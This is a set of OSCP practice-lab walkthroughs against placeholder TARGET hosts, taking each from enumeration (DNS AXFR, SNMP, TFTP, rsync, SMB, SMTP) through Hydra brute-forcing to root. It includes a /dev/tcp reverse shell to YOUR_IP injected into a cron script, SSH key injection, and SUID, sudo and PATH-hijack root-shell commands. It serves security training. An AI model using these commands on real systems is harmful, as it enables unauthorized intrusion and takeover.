From Zero to OSCP

Goal: Perform a DNS zone transfer to map the internal domain, then exploit a writable cron job to escalate to root.

Phase 1 — Port Scan

Always start with a full TCP + top UDP scan.

nmap -sC -sV -p- -T4 TARGET       # Full TCP
nmap -sU --top-ports 50 TARGET    # Top UDP (catch DNS 53)

Expected open ports: 22/tcp (SSH), 53/tcp and 53/udp (DNS).

Phase 2 — DNS Zone Transfer

A zone transfer (AXFR) copies the entire DNS zone to your machine — essentially the internal host map. It works when the DNS server has not restricted who can request a zone transfer.

# First, find the zone name from the SOA record
dig SOA @TARGET lab.local

# Request the full zone transfer
dig AXFR lab.local @TARGET

You should get back every A record, CNAME, MX record, and TXT record in the domain. Look for non-obvious hostnames — internal servers, management interfaces, staging boxes — they often hint at the next pivot.

# Tool alternative: dnsenum
dnsenum --dnsserver TARGET --enum lab.local

# Tool alternative: fierce (good for brute-force subdomain discovery)
fierce --domain lab.local --dns-servers TARGET

Exam tip: Always try AXFR before brute-forcing. If the transfer is allowed, you get everything in one shot.

Phase 3 — Service Enumeration

With hostnames from the zone transfer, enumerate SSH and any web services.

ssh -v labuser@TARGET 2>&1 | grep "authentication methods"
# Check what auth methods are available

Phase 4 — SSH Foothold

Use credentials found in zone transfer TXT records or from brute-force.

# If you found credentials in TXT records:
ssh labuser@TARGET

# If brute-forcing (common in OSCP):
hydra -l labuser -P /usr/share/wordlists/rockyou.txt ssh://TARGET -t 4

# Get user flag
cat ~/user.txt

Phase 5 — Privilege Escalation via Cron

Once on the box, run local enumeration. The privesc vector here is a writable script that runs as root via cron.

# Check sudo rights
sudo -l

# Check cron jobs
cat /etc/crontab
ls -la /etc/cron*
crontab -l

# Check for world-writable scripts referenced in cron
find / -writable -name "*.sh" 2>/dev/null

# Once you find a writable cron script (e.g. /opt/backup.sh):
echo 'chmod +s /bin/bash' >> /opt/backup.sh
# Wait for cron to run (usually every minute)
watch -n 5 ls -la /bin/bash

# Once /bin/bash is SUID:
/bin/bash -p
whoami        # should be root
cat /root/root.txt

Pattern to remember: cron runs as root → find script → check write permissions → append payload → wait → escalate. This exact chain appears on multiple OSCP exam machines.

Goal: Brute-force the SNMP community string to enumerate running processes, open ports, and installed software. Use SUID abuse to escalate to root.

Phase 1 — Port Scan

nmap -sU --top-ports 200 TARGET    # Must scan UDP — SNMP is 161/udp
nmap -sC -sV -p 22,161 TARGET

Phase 2 — SNMP Community String Discovery

SNMP v1/v2c uses a "community string" as a shared secret. The default is public, but admins sometimes change it to something weak. Brute-force with a known wordlist:

# onesixtyone — fast SNMP community brute-forcer
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt TARGET

# Alternative: nmap script
nmap -sU -p 161 --script snmp-brute TARGET

Once you find the community string (e.g. public or private), use it for full enumeration:

Phase 3 — OID Enumeration

SNMP exposes a huge tree of Object Identifiers (OIDs). The key branches for pentesting:

# Walk the entire tree (verbose — good for learning)
snmpwalk -v2c -c COMMUNITY_STRING TARGET

# Specific OIDs (much faster on exam day)
# Running processes:
snmpwalk -v2c -c COMMUNITY_STRING TARGET 1.3.6.1.2.1.25.4.2.1.2

# Installed software:
snmpwalk -v2c -c COMMUNITY_STRING TARGET 1.3.6.1.2.1.25.6.3.1.2

# Listening ports:
snmpwalk -v2c -c COMMUNITY_STRING TARGET 1.3.6.1.2.1.6.13.1.3

# User accounts:
snmpwalk -v2c -c COMMUNITY_STRING TARGET 1.3.6.1.4.1.77.1.2.25

What to look for: Process names that hint at other services (web servers, databases), usernames in the account OID, and port numbers that nmap may have missed (especially UDP services).

Phase 4 — SSH Foothold

Use usernames and any credentials found in the SNMP walk to log in.

ssh labuser@TARGET
cat ~/user.txt

Phase 5 — SUID Binary PrivEsc

SUID (Set-User-ID) means a binary runs with the permissions of its owner, not the user who executes it. A SUID binary owned by root that allows command execution = root shell.

# Find all SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Cross-reference with GTFOBins: https://gtfobins.github.io/
# Common SUID privesc examples:

# If 'find' is SUID:
find . -exec /bin/bash -p \; -quit

# If 'python3' is SUID:
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# If 'nmap' is SUID (older versions):
echo "os.execute('/bin/bash')" > /tmp/nmap.script
nmap --script /tmp/nmap.script

# Get root flag
cat /root/root.txt

GTFOBins is your friend: Any time you find an unusual SUID binary, check https://gtfobins.github.io/ for the exact escalation command. Bookmark it before your exam.

Goal: Brute-force Telnet credentials, establish a stable shell, then escalate via a sudo-allowed binary.

Phase 1 — Port Scan

nmap -sC -sV -p- -T4 TARGET

Expected: 23/tcp (Telnet), 22/tcp (SSH).

Phase 2 — Telnet Credential Brute-Force

Telnet has no built-in brute-force protection. Use Hydra with a targeted username list and rockyou.txt. Keep thread count low (-t 4) to avoid connection drops.

# Hydra Telnet brute-force
hydra -l admin -P /usr/share/wordlists/rockyou.txt telnet://TARGET -t 4

# If you have multiple candidate usernames:
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt telnet://TARGET -t 4

# Manual Telnet login test
telnet TARGET

Phase 3 — Shell Stabilisation

Raw Telnet shells are fragile — Ctrl+C kills your session, tab-completion doesn't work, and interactive programs break. Always stabilise immediately after getting access.

# Step 1 — spawn a real PTY inside Python
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Step 2 — background the shell and fix your local terminal
# (Press Ctrl+Z to background)

# Step 3 — in your LOCAL terminal:
stty raw -echo; fg

# Step 4 — set terminal size (back in the remote shell)
export TERM=xterm-256color
stty rows 40 cols 160

# Now: Ctrl+C works, tab completes, vim works

Get the user flag: cat ~/user.txt

Phase 4 — sudo PrivEsc via GTFOBins

sudo -l shows what the current user can run as root without a password. If you see a binary listed on GTFOBins, you have an instant root.

sudo -l
# Example output:
# (ALL) NOPASSWD: /usr/bin/vim

# GTFOBins escalation for vim:
sudo vim -c ':!/bin/bash'

# GTFOBins for nano:
sudo nano
# Then: Ctrl+R, Ctrl+X → type: reset; bash 1>&0 2>&0

# GTFOBins for less:
sudo less /etc/passwd
# Then type: !bash

# GTFOBins for awk:
sudo awk 'BEGIN {system("/bin/bash")}'

cat /root/root.txt

Pattern: sudo -l → GTFOBins lookup → one-liner root. This works on a huge percentage of OSCP boxes. Run it before anything else on privilege escalation.

Goal: Use unauthenticated TFTP to retrieve a configuration file containing credentials, then exploit a SUID binary for root.

Phase 1 — Port Scan

nmap -sU -p 69 TARGET       # TFTP is UDP 69
nmap -sC -sV -p 22 TARGET   # SSH for foothold

Phase 2 — TFTP Enumeration

TFTP (Trivial File Transfer Protocol) has zero authentication. If you know a filename you can download it. The challenge is guessing which files exist — use nmap's TFTP enumeration script with a wordlist.

# nmap script enum
nmap -sU -p 69 --script tftp-enum --script-args tftp-enum.filelist=/usr/share/seclists/Discovery/TFTP/tftp.txt TARGET

# Manual download (you need the filename)
tftp TARGET
tftp> get backup.conf
tftp> get config.txt
tftp> get passwords.txt
tftp> quit

The retrieved file will contain credentials — read it and pivot to SSH.

cat backup.conf   # look for username + password fields

Phase 3 — SSH Foothold

ssh labuser@TARGET
cat ~/user.txt

Phase 4 — SUID Binary Analysis with strings

When you find a custom SUID binary you've never seen before, strings is your first tool. It extracts all printable character sequences — often revealing hard-coded commands, paths, or passwords.

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Analyse the custom binary
strings /path/to/suid_binary

# Look for:
# - system() calls: "bash", "sh", "/bin/sh", "cat /root"
# - Hard-coded paths: "/tmp/", "/opt/"
# - Unquoted commands (PATH injection vulnerable)

# If the binary calls a command without a full path (e.g. 'ls' instead of '/bin/ls'):
# PATH injection attack:
echo '/bin/bash' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH
/path/to/suid_binary    # now executes /tmp/ls as root

cat /root/root.txt

Goal: Find an exposed rsync module, download its contents to extract credentials or SSH keys, then write your own SSH public key to gain root access.

Phase 1 — Port Scan

nmap -sC -sV -p 22,873 TARGET   # 873/tcp is rsync

Phase 2 — Rsync Module Enumeration

Rsync exposes "modules" — named sync paths that may require no authentication. List them first, then access each one.

# List available modules
rsync rsync://TARGET/

# Example output:
# backup          Backup directory
# www             Web root

# List contents of a module
rsync rsync://TARGET/backup/

# Download the entire module
rsync -av rsync://TARGET/backup/ /tmp/backup_loot/

Look inside the downloaded data for credentials, SSH keys, configuration files, and source code.

grep -r "password\|passwd\|ssh\|key" /tmp/backup_loot/ 2>/dev/null
find /tmp/backup_loot -name "*.conf" -o -name "*.key" -o -name "*.pem" 2>/dev/null

Phase 3 — SSH Key Injection (if module is writable)

If you can write to an rsync module that maps to a home directory, you can push your SSH public key into authorized_keys and log in as that user — or root if the module is /root.

# Generate an SSH key pair locally (if you don't have one)
ssh-keygen -t ed25519 -f /tmp/lab_key -N ""

# Upload your public key via rsync
rsync -av /tmp/lab_key.pub rsync://TARGET/backup/.ssh/authorized_keys

# Log in with the private key
ssh -i /tmp/lab_key root@TARGET
cat /root/root.txt

Phase 4 — Writable Cron PrivEsc (if no SSH key injection)

Alternatively, if the module maps to a cron directory:

cat /etc/crontab
# Find writable scripts
ls -la /opt/scripts/

# Inject reverse shell into writable cron script
echo 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1' >> /opt/scripts/backup.sh

# Start listener on YOUR machine
nc -lvnp 4444

Goal: Enumerate SMB shares with null session, download files from anonymous FTP, chain the credentials to get an SSH shell, then escalate.

Phase 1 — Port Scan

nmap -sC -sV -p 21,22,139,445 TARGET

Expected: 21/tcp FTP, 22/tcp SSH, 139/445 tcp SMB.

Phase 2 — SMB Null Session Enumeration

A null session means connecting to SMB with no username and no password. Many older or misconfigured servers allow this and expose share listings and user information.

# List shares — no credentials
smbclient -L //TARGET -N

# Connect to a specific share
smbclient //TARGET/SHARENAME -N

# Full null-session enumeration (users, groups, shares, policies)
enum4linux -a TARGET

# Alternative: crackmapexec
crackmapexec smb TARGET --shares -u '' -p ''

Inside the SMB share, look for documents, scripts, or backup files. Download everything and read it.

# Inside smbclient:
smb: \> ls
smb: \> get credentials.txt
smb: \> recurse ON
smb: \> mget *

Phase 3 — Anonymous FTP

# Try anonymous login (username: anonymous, password: anything)
ftp TARGET
Name: anonymous
Password: [press Enter]

ftp> ls -la
ftp> get interesting_file.txt
ftp> binary          # switch to binary mode for downloads
ftp> mget *          # download all files

Phase 4 — Credential Chain to SSH

Combine findings from SMB and FTP. Admins often reuse passwords across services — try every credential you found against SSH.

# Try credentials found in files
ssh USERNAME@TARGET

# If you have multiple credentials, try them all
# or use a small Hydra run:
hydra -L users.txt -P passwords.txt ssh://TARGET -t 4

cat ~/user.txt

Phase 5 — PrivEsc

sudo -l
find / -perm -4000 -type f 2>/dev/null
cat /etc/crontab

Goal: Use SMTP commands to enumerate valid usernames, then use the discovered usernames in a password spray against SSH to gain a foothold.

Phase 1 — Port Scan

nmap -sC -sV -p 25,22 TARGET

Phase 2 — Manual SMTP Interaction

Connect to port 25 manually to understand what commands the server supports. The SMTP banner often reveals the server software and version, which may have known CVEs.

nc TARGET 25
# Or: telnet TARGET 25

# After connecting, greet the server:
EHLO test.local
# The server responds with a list of supported extensions

# VRFY checks if a username exists (often enabled on misconfigured servers):
VRFY root
VRFY admin
VRFY labuser

# EXPN expands a mailing list — also leaks usernames:
EXPN admin

# RCPT TO technique (works when VRFY is disabled):
MAIL FROM: 
RCPT TO:      # 250 = user exists, 550 = does not exist

Phase 3 — Automated User Enumeration

# smtp-user-enum — specialised tool for this
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t TARGET

# Try all three methods:
smtp-user-enum -M VRFY -U users.txt -t TARGET
smtp-user-enum -M EXPN -U users.txt -t TARGET
smtp-user-enum -M RCPT -U users.txt -t TARGET -D domain.local

Phase 4 — Open Relay Test

An open relay allows sending email through the server without authentication — a serious misconfiguration.

nc TARGET 25
EHLO test
MAIL FROM: 
RCPT TO: 
DATA
Subject: relay test
Test email body.
.
QUIT
# 250 = relay accepted (open relay confirmed)

Phase 5 — SSH Password Spray

Take the valid usernames discovered via SMTP and spray them against SSH with common passwords. Use -t 4 to stay under connection rate limits.

hydra -L valid_users.txt -P /usr/share/wordlists/rockyou.txt ssh://TARGET -t 4

# Or a targeted spray with a known common password:
hydra -L valid_users.txt -p Password123 ssh://TARGET -t 4

ssh USERNAME@TARGET
cat ~/user.txt

Phase 6 — sudo python3 PrivEsc

sudo -l
# (ALL) NOPASSWD: /usr/bin/python3

sudo python3 -c 'import os; os.system("/bin/bash")'
cat /root/root.txt